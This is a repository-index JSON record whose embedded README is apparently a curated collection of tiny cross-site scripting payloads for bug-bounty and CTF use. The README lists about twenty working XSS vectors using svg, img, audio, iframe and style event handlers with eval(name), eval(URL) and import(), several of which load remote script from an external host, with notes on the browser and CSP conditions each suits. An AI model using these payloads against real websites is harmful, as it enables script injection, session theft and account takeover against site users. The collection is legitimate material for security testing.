{"id":15028315,"url":"https://github.com/terjanq/tiny-xss-payloads","last_synced_at":"2025-04-13T19:18:46.230Z","repository":{"id":42476357,"uuid":"278477488","full_name":"terjanq/Tiny-XSS-Payloads","owner":"terjanq","description":"A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me","archived":false,"fork":false,"pushed_at":"2024-11-29T23:58:23.000Z","size":633,"stargazers_count":2071,"open_issues_count":0,"forks_count":204,"subscribers_count":49,"default_branch":"master","last_synced_at":"2025-04-06T17:01:34.295Z","etag":null,"topics":["bugbounty","ctf","html","javascript","payloads","xss"],"latest_commit_sha":null,"homepage":"https://tinyxss.terjanq.me/","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/terjanq.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-07-09T21:45:19.000Z","updated_at":"2025-04-05T19:17:58.000Z","dependencies_parsed_at":"2025-01-19T03:50:58.337Z","dependency_job_id":"ef3f1d46-65ef-48ca-8bc7-8b603fcf6d4c","html_url":"https://github.com/terjanq/Tiny-XSS-Payloads","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/terjanq%2FTiny-XSS-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/terjanq","download_url":"https://codeload.github.com/terjanq/Tiny-XSS-Payloads/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248766724,"owners_count":21158302,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","ctf","html","javascript","payloads","xss"],"created_at":"2024-09-24T20:08:00.522Z","updated_at":"2025-04-13T19:18:46.208Z","avatar_url":"https://github.com/terjanq.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Tiny-XSS-Payloads\nA collection of short XSS payloads that can be used in different contexts.\n\nThe DEMO available here: \u003chttps://tinyxss.terjanq.me\u003e\n\n\n## Current Payloads\n\n```html\n\u003c!-- Requires a relative script inserted to the DOM after the sink, \n  e.g. \u003cbase/href=//NJ.₨\u003e ... \u003cscript src=/aaa\u003e\u003c/script\u003e --\u003e\n\u003cbase/href=//NJ.₨\u003e\n```\n\n```html\n\u003c!-- Only works as reflected XSS --\u003e\n\u003csvg/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control the URL --\u003e\n\u003csvg/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If you control the name, but unsafe-eval not enabled --\u003e\n\u003csvg/onload=location=name\u003e\n```\n\n```html\n\u003c!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM --\u003e\n\u003csvg\u003e\u003csvg/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --\u003e\n\u003caudio/src/onerror=eval(name)\u003e\n```\n\n```html\n\u003c!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --\u003e\n\u003cimg/src/onerror=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- Just a casual script --\u003e\n\u003cscript/src=//NJ.₨\u003e\u003c/script\u003e\n```\n\n```html\n\u003c!-- If you control the name of the window --\u003e\n\u003ciframe/onload=src=top.name\u003e\n```\n\n```html\n\u003c!-- If you control the URL --\u003e\n\u003ciframe/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If number of iframes on the page is constant --\u003e\n\u003ciframe/onload=src=top[0].name+/\\NJ.₨?/\u003e\n```\n\n```html\n\u003c!-- for Firefox only --\u003e\n\u003ciframe/srcdoc=\"\u003csvg\u003e\u003cscript/href=//NJ.₨ /\u003e\"\u003e\n```\n\n```html\n\u003c!-- If number of iframes on the page is random --\u003e\n\u003ciframe/onload=src=contentWindow.name+/\\NJ.₨?/\u003e\n```\n\n```html\n\u003c!-- If unsafe-inline is disabled in CSP and external scripts allowed --\u003e\n\u003ciframe/srcdoc=\"\u003cscript/src=//NJ.₨\u003e\u003c/script\u003e\"\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed --\u003e\n\u003cstyle/onload=eval(name)\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed and the URL can be controlled --\u003e\n\u003cstyle/onload=eval(`'`+URL)\u003e\n```\n\n```html\n\u003c!-- If inline styles are blocked --\u003e\n\u003cstyle/onerror=eval(name)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import, doesn't work in innerHTML --\u003e\n\u003c!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003csvg/onload=import(/\\\\NJ.₨/)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import,  triggers if inline styles are allowed.\n\u003c!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003cstyle/onload=import(/\\\\NJ.₨/)\u003e\n```\n\n```html\n\u003c!-- Uses external script as import --\u003e\n\u003c!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header --\u003e\n\u003ciframe/onload=import(/\\\\NJ.₨/)\u003e\n```\n\nDeprecated:\n\n```html\n\u003c!-- If you control the URL, Safari-only --\u003e\n\u003ciframe/onload=write(URL)\u003e\n```\n\n```html\n\u003c!-- If inline styles are allowed, Safari only --\u003e\n\u003cstyle/onload=write(URL)\u003e\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fterjanq%2Ftiny-xss-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fterjanq%2Ftiny-xss-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fterjanq%2Ftiny-xss-payloads/lists"}